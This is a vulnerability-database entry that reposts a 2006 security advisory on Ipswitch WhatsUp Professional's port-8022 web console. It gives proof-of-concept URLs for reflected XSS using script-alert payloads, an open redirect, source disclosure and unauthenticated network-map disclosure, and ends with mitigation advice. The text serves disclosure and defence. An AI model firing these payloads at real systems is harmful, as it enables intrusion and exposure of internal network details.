Ipswitch WhatsUp Professional multiple flaws

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053250 漏洞类型
发布时间 2006-05-17 更新时间 2006-05-17
CVE编号 CVE-2006-2357
CVE-2006-2356
CVE-2006-2353
CVE-2006-2351
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050094
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
WhatsUp is a tool from Ipswitch to monitor application and network,
embedding a custom web server on port 8022.

Description:

This custom web server is prone to multiple flaws.

-as authenticated user:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*there are many XSS flaws, as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("m
e");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT>
http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHos
tname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=
32&btnPing=Ping

*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/De
vicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr

-not being authenticated:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0

The weaknesses have been confirmed in version 2006, source disclosure
in version 2005 and 2005 SP1 too.
Other versions may also be affected.

No response from vendor.

Solution:
-Filtered TCP port 8022, ask a patch from vendor if you are a registered user
-Keep an eye on an opensource project: http://gnms.rubyforge.org

David Maciejak